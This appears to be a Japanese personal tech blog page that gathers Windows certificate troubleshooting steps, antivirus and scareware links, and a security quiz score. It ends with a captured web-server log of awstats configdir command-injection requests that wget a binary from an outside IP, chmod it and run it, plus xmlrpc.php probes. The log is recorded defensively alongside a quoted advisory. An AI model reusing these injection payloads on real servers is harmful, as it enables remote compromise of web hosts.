現在のシステム時計または署名ファイルのタイムスタンプで確認すると、必要な証明書の有効期間が過ぎています。  対処法   Windows XP、2003 の場合は、ユーザアカウントのキャッシュとシステムアカウントのキャッシュをクリアする。   コマンドから   certutil -urlcache * delete   at hh:mm /interactive cmd.exe ※ hh:mm は現在の時間+1分後を指定   システム権限でコマンドが起動してきたら   certutil -urlcache * delete      VISTA以降   コマンドから   certutil -urlcache * delete   PsTools をダウンロード http://technet.microsoft.com/ja-jp/sysinternals/bb897553(en-us).aspx   Psexec -i -s cmd.exe   certutil -urlcache * delete      参考   [障害情報] crypt32 (Windows XP, Windows Server 2003)、Microsoft-Windows-CAPI2 (Windows Vista 以降) のイベント   http://blogs.technet.com/b/jpntsblog/archive/2010/07/22/crypt32-windows-xp-windows-server-2003-microsoft-windows-capi2-windows-vista.aspx 2010.8 から XP が激重になって使い物にならない場合の対策 現時点で特定されているのは、 Microsoft Update の自動更新を無効化する。 (サービスから Automatic Updates を停止)または Microsoft Update の設定の変更から、Windows Update を利用するように戻す。 エラー番号: 0x80248015 の対策。 打つ手なし? 自動更新を無効にし、再度有効にして自動更新で回避。 おそらく .NET FrameWork がインストールされてないと駄目。 時期的にこの辺りが怪しい。 更新プログラムを Windows Server 2003 での SHA-TLS_RSA_WITH_AES_128_CBC_SHA AES128 および AES256 SHA AES の TLS_RSA_WITH_AES_256_CBC_SHA の暗号スイートのサポートを追加します。 https://support.microsoft.com/kb/948963
「国内ユーザーの40人に1人がボットに感染」――Telecom-ISACなどが調査 http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050727/165402/ スパイウエアを捕まえろ(特集) http://arena.nikkeibp.co.jp/tokushu/gen/20050629/112654/ って事でオンラインでチェック出来るサイトを探しました。 X-Cleaner http://www.shareedge.com/spywareguide/txt_onlinescan.php ウイルスチェック、駆除出来るサイト http://www.pandasoftware.com/products/activescan/com/activescan_principal.htm 日本語は http://www.pandasoftware.jp/ から左の「Panda ActiveScan」から可能です。 単体のファイルがウイルスに感染してないかチェックを行う場合は http://www.virustotal.com/flash/index_en.html が良いでしょう。 select file にファイルを仕込んで Send を押すだけです。 ※有名メーカのアンチウイルスはスキャンのみで駆除してくれません。 トレンドマイクロ オンラインスキャン http://www.trendmicro.co.jp/hcall/index.asp シマンテック・セキュリティチェック http://security.symantec.com/sscv6/default.asp?productid=symhome&langid=jp&venid=sym マカフィー フリースキャン http://www.so-net.ne.jp/option/security/freescan-jp/mfs/FreeScan_EULA_Page.htm Kaspersky Labs - オンラインスキャン http://www.kaspersky.co.jp/scanforvirus/ など。。。 アンチウイルス検出性能比較 http://www.virus.gr/english/fullxml/default.asp?id=69&mnu=69 Kaspersky が最強ですね。日本の代理店がやる気なさそうなのが問題ですが・・・ 6になって、ジャストシステムになりました。早速サポートしてもらった訳ですが、、、 5から6へのアップデートが以外とややこしい(バックアップキーを持っている場合は注意) で、いきなりアップデートでトラブルが、、、  定義ファイル更新トラブル発生のお詫びと対処方法について  http://www.just-kaspersky.jp/support/faq01.html  ウイルス対策ソフト「カスペルスキー」製品情報:JUST Kasperskyポータル  http://www.just-kaspersky.jp/products/ AV-Comparatives http://www.av-comparatives.org/index.html?http://www.av-comparatives.org/seiten/comparatives.html  http://www.av-comparatives.org/seiten/ergebnisse/report11.pdf ウイルス対策ソフトウエアの性能比較記事にもの申す!(前編) http://blog.nikkeibp.co.jp/pconline/security/2006/11/sonoda003.html アンチウイルスに関しては、MS が認定している製品使うのが安心ですね。  Microsoft Windows セキュリティ センターのウイルス対策パートナー  http://www.microsoft.com/athome/security/viruses/wsc/ja/default.mspx  マイクロソフト、家庭向けフィルタリングソフトを無償提供  http://japan.cnet.com/news/sec/story/0,2000056024,20320927,00.htm  マイクロソフト,企業向けのセキュリティ対策製品を提供開始へ  http://itpro.nikkeibp.co.jp/article/NEWS/20061124/254803/  マイクロソフト,企業向けウイルス対策製品をいよいよ国内投入  http://itpro.nikkeibp.co.jp/article/NEWS/20061124/254804/ Windows Server 2003、Windows 2000、または Windows XP を実行しているコンピュータでウイルス スキャンを行う場合の推奨事項 http://support.microsoft.com/kb/822158/ja Windows Defender http://www.microsoft.com/japan/athome/security/spyware/software/default.mspx スパイウェア対策はいまだ不十分――米調査 http://www.itmedia.co.jp/enterprise/articles/0611/14/news016.html スパイウェア対策ツールは、複数使うべきだと思う - 「走れ!プロジェクトマネージャー!」 http://blogs.itmedia.co.jp/tooki/2006/11/post_a93d.html?ref=rssall スパイウェア リスト http://www.shareedge.com/spywareguide/product_list_full.php?category_id=43  SystemDoctor  http://internet.watch.impress.co.jp/cda/news/2006/09/05/13196.html  DriveCleaner  http://itpro.nikkeibp.co.jp/article/NEWS/20061012/250564/ You Tube に表示される、アレ。2006.11.16 偽警告 偽警告  YouTube上にも登場、詐欺的セキュリティソフトへ誘導するバナー広告  http://internet.watch.impress.co.jp/cda/news/2006/10/18/13656.html と比べると、日本語力がアップしてます。 多様化したネット上の押し売り/志茂田景樹さん<2> http://arena.nikkeibp.co.jp/col/20060925/118911/ 今後はこっちの手口が増えそうなのかな。(もう古い)  YouTubeの怪−−99万9999人目で20万円当選  http://blog.nikkeibp.co.jp/pconline/editor/archives/2006/11/post_57.html  【レポート】あなたの周りのネットセキュリィ - 詐欺サイトに釣られるリアルな瞬間  http://journal.mycom.co.jp/articles/2006/11/24/netsecurity/  「おめでとう!当選です」「エラーを検出しました」---バナー広告の罠に注意  http://itpro.nikkeibp.co.jp/article/NEWS/20061204/255816/  「おめでとう!あなたは999999番目の訪問者です」別サイトへ誘導する“罠”に注意  http://itpro.nikkeibp.co.jp/article/NEWS/20061201/255686/ こんどはこっち。  「ページを表示できません」,偽のエラー・ページでソフトを“押し売り”  http://itpro.nikkeibp.co.jp/article/NEWS/20061205/256023/  アドウェアインストールあの手この手、今度は「エラー表示」を装う手口  http://www.itmedia.co.jp/enterprise/articles/0612/04/news068.html  スパムを撃退するにはまず中身を知れ  http://techtarget.itmedia.co.jp/tt/news/0612/06/news03.html  スパムの基本知識が判ります。(無料のユーザ登録が必要) 脅威,すべてはWebアクセスから始まる 第3回 通用しなくなった「80番ポートの安全神話」 http://itpro.nikkeibp.co.jp/article/COLUMN/20071005/283909/ ノーガードサイトの見分け方 http://pc.nikkeibp.co.jp/article/NPC/20070614/274780/?set=ml ちょっとした予防策として。。。  scandoo  http://g.s.scandoo.com   Google の代わりに代用   サイトの危険性を警告してくれます。   詳しくは下記記事を    プラグインなしでサイトの危険性を警告する「Scandoo」--ベータがまもなく発表へ    http://japan.cnet.com/news/sec/story/0,2000056024,20112807,00.htm      プラグインの場合は、マカフィサイトアドバイザー等が在ります。   ルートしかチェックしてないようで、微妙ですけど。。。   2007.12.5 時点でインストール時に SITEADV.EXE がリスクウェア「Trojan.generic」の亜種として検知されます。   サイトもバグが・・・>Mod_python error: "PythonHandler mod_python.psp"        マカフィーの無料のWebサイト安全性評価ツール,ダウンロード数が3800万件超える     http://itpro.nikkeibp.co.jp/article/NEWS/20070319/265652/     ネットクラフトのアンチフィッシングツールバー     http://news.netcraft.com/   リンク先のウイルスチェックに Dr.Web のプラグイン。    ブラウザに組み込む無償ウイルス対策ツール「Dr.WEB リンクチェッカー」    http://internet.watch.impress.co.jp/cda/news/2006/10/12/13599.html      あとは aguse.net 辺りを…       aguse.net    http://www.aguse.net/ そういえば、YAHOO の検索結果に ブックマーク数出るようになってますね。 いつからだろう。。。
2006年のヒット商品番付、「ウイルスセキュリティZERO」が東前頭6枚目に http://internet.watch.impress.co.jp/cda/news/2006/12/05/14136.html   うわ〜、みんな更新無料の罠にはまってますよ…   今流行っているウイルス(WildList)監査で、5つに1つの割合で見逃す   アンチウイルスなんて欠陥商品でしょう。なんで問題にならないかなぁ...   http://www.nikkeibp.co.jp/sj/special/185/04.html    WildList    http://www.wildlist.org/WildList/    このリストには世界中に散らばるウイルス研究者が「実際にフィールドから受け取ったウイルス」が掲載されています。    ウイルス対策製品の検出の正確さを図る指標である「Virus Bulletin( http://www.virusbtn.com/index )」のテストにも用いられています。 ウイルス対策に近道なし、基本は一にも二にも「教育」 http://www.itmedia.co.jp/enterprise/articles/0501/20/news093.html 古い定義ファイル・エンジンで、ウイルスはどれだけ検出できるのか - アンチウイルスソフト評価 http://blog.lucanian.net/archives/50855056.html 園田道夫「蔵出しセキュリティ」 : ウイルス対策ソフトウエア、こんなテスト手法はいかが? http://blog.nikkeibp.co.jp/pconline/security/2006/12/sonoda005.html ウイルス対策ソフト比較 version 2007 http://www10.plala.or.jp/palm84/antivirus.html 中堅・中小企業の業務アプリ利用実態(3)ウイルスバスターのトップは当分安泰 http://itpro.nikkeibp.co.jp/article/COLUMN/20061122/254538/ 手口が巧妙化! 検挙率も下がってきている〜カスペルスキー氏に聞く「ネット犯罪」の今<1> http://arena.nikkeibp.co.jp/col/20061127/119900/ ネット犯罪の凶悪化がはじまった!  日本は大丈夫か!? 〜カスペルスキー氏に聞く「ネット犯罪」の今<2> http://arena.nikkeibp.co.jp/col/20061128/119905/ |日本のユーザーはセキュリティ対策の必要性だけでなく、対策ソフトの“質”についての意識も低いようです。 |私個人のイメージとして、日本人は製品のクオリティを重視すると思っていたので、セキュリティソフトの |利用率やユーザー意識の現状を聞いて少し驚いています。 |今後、いかに“質”を見極めていくかが、セキュリティ意識の向上へつながっていくのではないでしょうか。 インターネットは罠だらけ http://itpro.nikkeibp.co.jp/article/OPINION/20061211/256503/ 検索エンジンに潜む危険! アダルト用語でサーチ / 無料の文句に甘い罠も http://journal.mycom.co.jp/news/2006/12/12/008.html   【楽天ブログ】おすすめリンクに潜む出会い系サイトの罠 「楽天様にもの申す。(6660)」   http://plaza.rakuten.co.jp/nahatektek/diary/200703290000/   「雪だるまレース」懸賞 @Seesaa広告   http://blog.ptlabo.net/index.php?id=06120116   [364] 出会い系釣上げ懸賞&占い対策専用スレ   http://bbs02.kogumaneko.tk/patio.cgi?mode=view&no=364 いくら警告してもセキュリティ対策が進まない理由 http://www.itmedia.co.jp/enterprise/articles/0704/24/news005.html ハッカーがネットワークに侵入する方法 http://www.microsoft.com/japan/technet/technetmag/issues/2005/01/anatomyofahack/default.mspx ・侵入されたシステムに更新プログラムを適用して、システムをきれいな状態にすることはできません。  更新プログラムは脆弱性を取り除くだけにすぎません。 ・バックドアを削除して、侵入されたシステムをきれいな状態にすることはできません。 ・ある種の"脆弱性削除ツール" を使用して、侵入されたシステムをきれいな状態にすることはできません。 ・ウイルススキャナを使用して、侵入されたシステムをきれいな状態にすることはできません。 ・既存のインストールにオペレーティングシステムを上書きで再インストールしても、  侵入されたシステムをきれいな状態にすることはできません。 ・侵入されたシステムからコピーしたデータは、信用できません。 ・侵入されたシステムに関するイベントログは信用できません。 ・最後に行われたバックアップを信用できない場合があります。 侵入されたシステムをきれいな状態にする唯一の正しい方法は、システムをフラットにし、再構築することです。 「再インストールしかない」ならアンチウイルスの価値って??? アンラボ、世界で初めてセキュリティソフトウェア3製品が商用最高レベルEAL4コモンクライテリア獲得 http://www.value-press.com/pressrelease.php?article_id=17726&medium_id=969  一般的なアンチウイルスより動作が軽いらしい。  アマゾンのでの評価は高い。 ウイルス対策ソフト|クチコミランキング http://kuchiran.jp/pc/security.html  を見ると、売れているのは  ・ウイルスバスター  ・ノートン  ・ウイルスセキュリティZERO  ・マカフィ  のようです。  ちなみに最近は 3 台まで OK とかありますけど、出来れば違うアンチウイルス入れた方が良いかと。  そのアンチウイルスで検出されなくても別のアンチウイルスで検出されたりする場合もありますし。 秘匿を「ひじゃく」と読む会社のセキュリティは大丈夫か? http://www.nikkeibp.co.jp/style/biz/skillup/spam/071029_67th/ 「ITセキュリティは欠陥品市場」――セキュリティ専門家が警鐘 http://www.computerworld.jp/news/sec/84011.html  必ずしも売れている製品がいい製品とは限りませんって事で、、、  TV やマスコミの情報も話半分で。 セキュリティベンダー「G DATA」が日本市場3カ年計画 http://internet.watch.impress.co.jp/cda/news/2007/12/06/17772.html
今の自分の知識がどれ位か試してみた。  応用コース テクニカル編  http://www.sea-j.net/curriculum/technical.html  合格点 70% あなたの得点 36% 結果:不合格。  あぅ… orz   セクション        成績   脅威とその対策       0   OS の要塞化(windows) 100   OS の要塞化(UNIX)     0   DNS サーバーへのセキュリティ対策 100   メールサーバーへのセキュリティ対策 100   Web サーバーへのセキュリティ対策  100   ファイアウォール導入計画      100   IDS による侵入検知          0   VPN 導入計画             0   PKI の利用             100   総合問題              25  UNIX、IDS、VPN は触ってないからなぁ・・・  それにしても、0 とは、、、  IDS と VPN は今後の課題って事だな。。。  また、無料チケットが手に入ったら受けてみよう。 インターネット協会、“インターネット利用アドバイザー”制度を開始 http://ascii24.com/news/i/serv/article/2006/01/19/660090-000.html 第2回 システムエンジニアやプログラマに必要な資格とは? http://pcweb.mycom.co.jp/ad/2006/itengineer/05/index2.html と、いう事で無料のが在りました。  MCAベータ試験受験者募集/資格試験情報アール・プロメトリック  http://it.prometric-jp.com/event_campaign/campaign/mca_beta/mca.html ゲットしたんで来年はこれを受けに。。。  結果が届きました。  合格スコア:560 あなたの合計スコア:615  って、事で合格しました。ヽ( ^ω^)ノ
IPアドレスでアクセスしてくる捕獲用サイトになにやら引っかかったみたい。 XML-RPC for PHP Vulnerability Attack (NEW) http://isc.sans.org/diary.php?storyid=823 (SANS ISC) に情報がある。 http://www.jpcert.or.jp/wr/2005/wr054501.txt 一部抜粋-------------------------------------------------------------- [4] awstats に入力データを適切に無害化しない脆弱性 CIAC Bulletin Q-052 awstats http://www.ciac.org/ciac/bulletins/q-052.shtml awstats には、ユーザ入力データを eval() 関数に渡す前に適切に無害化しな い脆弱性があります。結果として、遠隔から第三者が Web サーバのログに記 録される HTTP Referrer 変数を経由して、awstats を実行しているユーザの 権限を取得する可能性があります。 ---------------------------------------------------------------------- そういう事らしい。 2005-11-04 22:27:59 61.194.16.3 GET /cgi-bin/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:27:59 61.194.16.4 GET /cgi-bin/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:00 61.194.16.4 GET /scgi-bin/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:00 61.194.16.3 GET /scgi-bin/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:01 61.194.16.4 GET /awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:01 61.194.16.3 GET /awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:02 61.194.16.4 GET /cgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:02 61.194.16.3 GET /cgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:04 61.194.16.4 GET /scgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:04 61.194.16.3 GET /scgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:05 61.194.16.4 GET /cgi/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:05 61.194.16.3 GET /cgi/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:06 61.194.16.4 GET /scgi/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:06 61.194.16.3 GET /scgi/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:07 61.194.16.4 GET /scripts/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:07 61.194.16.3 GET /scripts/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:08 61.194.16.4 GET /cgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:08 61.194.16.3 GET /cgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:09 61.194.16.4 GET /scgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:09 61.194.16.3 GET /scgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:10 61.194.16.4 GET /cgi-bin/stats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:10 61.194.16.3 GET /cgi-bin/stats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:11 61.194.16.4 GET /scgi-bin/stats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:11 61.194.16.3 GET /scgi-bin/stats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:12 61.194.16.4 GET /stats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:12 61.194.16.3 GET /stats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo| 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 64 2005-11-04 22:28:12 61.194.16.4 POST /xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:12 61.194.16.3 POST /xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:14 61.194.16.4 POST /xmlrpc/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:14 61.194.16.3 POST /xmlrpc/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:15 61.194.16.4 POST /xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:15 61.194.16.3 POST /xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:16 61.194.16.4 POST /blog/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:16 61.194.16.3 POST /blog/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:17 61.194.16.4 POST /drupal/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:17 61.194.16.3 POST /drupal/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:18 61.194.16.4 POST /community/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:18 61.194.16.3 POST /community/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:19 61.194.16.4 POST /blogs/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:19 61.194.16.3 POST /blogs/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:21 61.194.16.4 POST /blogs/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:21 61.194.16.3 POST /blogs/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:22 61.194.16.4 POST /blog/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:22 61.194.16.3 POST /blog/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:23 61.194.16.4 POST /blogtest/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:23 61.194.16.3 POST /blogtest/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:24 61.194.16.4 POST /b2/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:24 61.194.16.3 POST /b2/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:25 61.194.16.4 POST /b2evo/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:25 61.194.16.3 POST /b2evo/xmlsrv/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:26 61.194.16.4 POST /wordpress/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 22:28:26 61.194.16.3 POST /wordpress/xmlrpc.php - 80 - nocsupport.sti.net Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 401 2 2148074254 2005-11-04 